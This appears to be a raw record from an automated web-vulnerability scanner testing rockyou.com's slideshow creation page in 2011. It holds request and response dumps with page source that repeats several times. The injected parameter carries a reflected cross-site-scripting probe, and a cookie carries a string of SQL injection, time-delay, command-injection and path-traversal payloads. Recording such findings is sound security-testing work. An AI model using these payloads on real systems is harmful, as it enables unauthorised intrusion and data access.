Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "cyo";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=cyo&refid='%22%3E%3Cnet%20sparker=netsparker(0x0010C7)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //..
Date: Mon, 18 Apr 2011 22:12:47 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:46 GMT; path=/; domain=.rockyou.com,lastlogin=1303164767; expires=Wed, 27-Jul-2011 22:12:47 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:47 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=27842 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26918
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "cyo";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=cyo&refid='%22%3E%3Cnet%20sparker=netsparker(0x0010C7)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| refid | GET | '"><net sparker=alert(0x001215)> |
| create | GET | 1 |
| instanceid | GET | 3 |
Request
GET /slideshow-create.php?refid='%22%3E%3Cnet%20sparker=netsparker(0x001215)%3E&create=1&instanceid=3 HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164892; ctid=2; sns_type=rockyou.com; istack=%27%29%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--%7Cwww202.rockyou.com%7C%7C%22%26+SET+%2FA+0xFFF9999-2+%26%7Cwww202.rockyou.com%7C%7C%27%26+SET+%2FA+0xFFF9999-2+%26%7Cwww202.rockyou.com%7C%7C1+AND+%27NS%3D%27ss%7Cwww202.rockyou.com%7C%7C%27+OR+%27ns%27%3D%27ns%7Cwww202.rockyou.com%7C%7C-1+OR+17-7%3D10%7Cwww202.rockyou.com%7C%7C1+OR+X%3D%27ss%7Cwww202.rockyou.com%7C%7C%27+OR+%271%27%3D%271%7Cwww202.rockyou.com%7C%7C..%252F..%252F..%252F..%252F..%252F..%252FCANTBEHERE%252F..%252F..%252F..%252F..%252Fboot.ini%7Cwww202.rockyou.com%7C%7CSELECT+SLEEP%2825%29--+%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164892; ctid=2; sns_type=rockyou.com; istack=%27%29%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--%7Cwww202.rockyou.com%7C%7C%22%26+SET+%2FA+0xFFF9999-2+%26%7Cwww202.rockyou.com%7C%7C%27%26+SET+%2FA+0xFFF9999-2+%26%7Cwww202.rockyou.com%7C%7C1+AND+%27NS%3D%27ss%7Cwww202.rockyou.com%7C%7C%27+OR+%27ns%27%3D%27ns%7Cwww202.rockyou.com%7C%7C-1+OR+17-7%3D10%7Cwww202.rockyou.com%7C%7C1+OR+X%3D%27ss%7Cwww202.rockyou.com%7C%7C%27+OR+%271%27%3D%271%7Cwww202.rockyou.com%7C%7C..%252F..%252F..%252F..%252F..%252F..%252FCANTBEHERE%252F..%252F..%252F..%252F..%252Fboot.ini%7Cwww202.rockyou.com%7C%7CSELECT+SLEEP%2825%29--+%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:14:53 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:14:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303164893; expires=Wed, 27-Jul-2011 22:14:53 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:14:53 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=43900 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26933
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = 